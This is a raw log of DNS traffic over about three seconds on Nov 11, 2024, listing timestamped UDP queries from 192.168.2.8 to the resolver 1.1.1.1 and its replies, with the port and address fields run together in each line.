                                                                                                                                                                                                              Nov 11, 2024 18:33:25.742041111 CET5792153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.742053032 CET53526821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.743802071 CET5537353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.746381998 CET53582701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.746491909 CET53632161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.746522903 CET53581921.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.748253107 CET4966953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.748615026 CET53550191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.748630047 CET53519871.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.752099037 CET53579211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.757056952 CET53526001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.759134054 CET53625011.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.761776924 CET53593951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.775830030 CET53553731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.782533884 CET53496691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806140900 CET6343853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806360006 CET5435253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806551933 CET6216053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806732893 CET6541653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806910038 CET5235153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.807075977 CET5042753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.807219982 CET5923753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.807368994 CET5612253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.807506084 CET5024553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.816498041 CET53634381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.816793919 CET53621601.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.817024946 CET53543521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.817538023 CET53504271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.817562103 CET53592371.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.820518970 CET53561221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.838229895 CET53502451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.838485956 CET53523511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.842799902 CET53654161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.963701963 CET5768553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.967542887 CET5164353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.974189997 CET53576851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.986799002 CET6068853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.996727943 CET53606881.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.000444889 CET53516431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.011049032 CET6098253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.011684895 CET5816853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.022790909 CET53609821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.043935061 CET53581681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.813764095 CET6352753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.814393044 CET6115953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.815361977 CET5677353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.819602966 CET5787753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.820547104 CET5878553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.824366093 CET53635271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.828279972 CET6134353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.829241037 CET53578771.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.834294081 CET53567731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.839304924 CET53613431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.844891071 CET53611591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.851202965 CET5711053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.852322102 CET53587851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.860981941 CET5226753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.862849951 CET53571101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.865416050 CET5571753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.866477013 CET5200453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.866692066 CET4991653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.867747068 CET6219753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.868539095 CET5148853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.870553970 CET5395453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.872066975 CET5746753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.872386932 CET5386453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.872724056 CET6436453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.878649950 CET5523553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.879074097 CET4987153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.879461050 CET5970453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.880053043 CET5201053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.880711079 CET6375953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881325006 CET6271853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881342888 CET5312853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881833076 CET5212853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.882101059 CET6361553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.882353067 CET5861853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.883841991 CET53557171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.884032011 CET53499161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.884046078 CET53538641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.886192083 CET53539541.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.886209011 CET53574671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.886220932 CET53643641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.889061928 CET53520041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.890177011 CET53498711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.891331911 CET53586181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.898031950 CET53521281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.898128986 CET53552351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.901197910 CET53621971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.901201010 CET5701353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.902257919 CET6429053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.902420998 CET4949353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.902919054 CET53522671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.902981997 CET53514881.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.903377056 CET5483753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.903531075 CET6498953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905250072 CET5304353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905535936 CET6012253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905750036 CET6524253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905908108 CET5277953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.906054974 CET6221953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.906084061 CET6272253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908437967 CET5855353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908629894 CET5122353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908859968 CET5775953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909099102 CET5386353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909383059 CET5262653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909431934 CET5621153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909615993 CET5746053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909770966 CET6368753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909837961 CET6380853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909956932 CET6140453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910140038 CET5937553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910172939 CET4982753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910361052 CET5253153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910444021 CET5920453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910558939 CET6313753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910847902 CET5014653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.911952972 CET53570131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.911972046 CET53637591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.911993027 CET53494931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.912003994 CET53597041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.912550926 CET53520101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.912575006 CET53642901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.912787914 CET53527791.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.914110899 CET53627181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.914268017 CET53531281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.914279938 CET53636151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.915406942 CET53601221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916284084 CET53530431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916301966 CET53627221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916373014 CET5660153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916466951 CET5725053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916594028 CET5549153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916707039 CET6378553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.917361975 CET5268253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.917805910 CET53498271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918004990 CET5505953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918296099 CET5662453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918454885 CET53577591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918739080 CET5097853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918915987 CET5326253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.920114994 CET53512231.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.920133114 CET53585531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.920156956 CET53538631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.920169115 CET53526261.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.920182943 CET53614041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.920193911 CET53593751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.920233965 CET53562111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.920250893 CET53574601.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.921004057 CET53525311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.921133995 CET53631371.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.923141003 CET53638081.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.923155069 CET53501461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.924339056 CET53554911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.926224947 CET53637851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.927272081 CET53566011.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.927999973 CET53526821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.929395914 CET53572501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.932257891 CET53532621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.934520960 CET53548371.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.934840918 CET5897153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.936773062 CET53649891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.939153910 CET53652421.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.942589998 CET53622191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.942620993 CET53636871.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.942828894 CET53592041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.946568012 CET53589711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.950364113 CET53550591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.950599909 CET53509781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.950629950 CET53566241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.828438997 CET6362253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.829011917 CET5951753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.832374096 CET5284553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.833671093 CET5322953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.839838982 CET53636221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.845693111 CET53532291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.848376989 CET5425053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.859241009 CET53542501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.860634089 CET53595171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.865627050 CET53528451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.882554054 CET5211253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.883833885 CET5748253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.889934063 CET5000553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.894088030 CET53574821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.904782057 CET5903253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.905771017 CET6197253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.909360886 CET53500051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.914823055 CET53521121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.915828943 CET53619721.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.916101933 CET53590321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.931539059 CET5408853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.944694042 CET5947953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.955374956 CET53594791.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.959070921 CET4931353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.960376024 CET5481953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.962456942 CET5264353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.962780952 CET6105753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.963831902 CET53540881.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.966007948 CET6404653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.967757940 CET6297453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.970180988 CET6179353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.970669985 CET53526431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.971553087 CET5920953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.972415924 CET53548191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.973880053 CET5699653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.975158930 CET5132853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.975559950 CET53640461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.976653099 CET5854153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.977340937 CET53629741.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.978796959 CET4985853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.978924036 CET5075753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.983283043 CET53617931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.983283997 CET6512753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.983488083 CET6003553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.987288952 CET53513281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.987891912 CET5356553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.988720894 CET5058953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.988909960 CET5264553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.989767075 CET6531653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.989948988 CET5327553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.990113020 CET6525053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.990264893 CET5669953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.991678953 CET53651271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.991786957 CET4957053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.993196011 CET53493131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.993551970 CET5704153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.993942976 CET6329953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.997854948 CET5703953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.998071909 CET5003053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.998701096 CET6098653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.999356985 CET53610571.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.999448061 CET5327753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.001707077 CET53566991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.002135992 CET53592091.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.003320932 CET5870753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.004590988 CET4953653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.004714966 CET53495701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.004848003 CET5832753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005038977 CET5307853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005284071 CET5934153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005429983 CET6399253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005568981 CET5253253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005713940 CET53532751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.006505013 CET53569961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.007771015 CET53570391.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.008229017 CET5589153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.008666039 CET53585411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.008910894 CET6313153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.009181023 CET53609861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.009792089 CET5374553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.010809898 CET53498581.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.010858059 CET53532771.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.010868073 CET53507571.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.012341976 CET53653161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.014820099 CET53587071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.015469074 CET53583271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.015780926 CET53593411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.015793085 CET53495361.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.015896082 CET53600351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.016192913 CET53530781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.018452883 CET53558911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.019638062 CET53631311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.020369053 CET53537451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.025648117 CET53526451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.025873899 CET53652501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.025886059 CET53570411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.026407003 CET53535651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.026802063 CET53632991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.029020071 CET53525321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.029654026 CET53500301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.036776066 CET53639921.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.040740967 CET5793653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.041019917 CET5422253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.041122913 CET5070153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.041307926 CET6162253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042016983 CET6512853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042187929 CET6055253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042334080 CET6510953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042471886 CET5483953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042483091 CET5677053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.044735909 CET5280253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.045269966 CET5312353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.050951004 CET53542221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.051136017 CET53579361.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.051743984 CET53507011.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.051757097 CET53651281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.052814007 CET53651091.1.1.1192.168.2.8
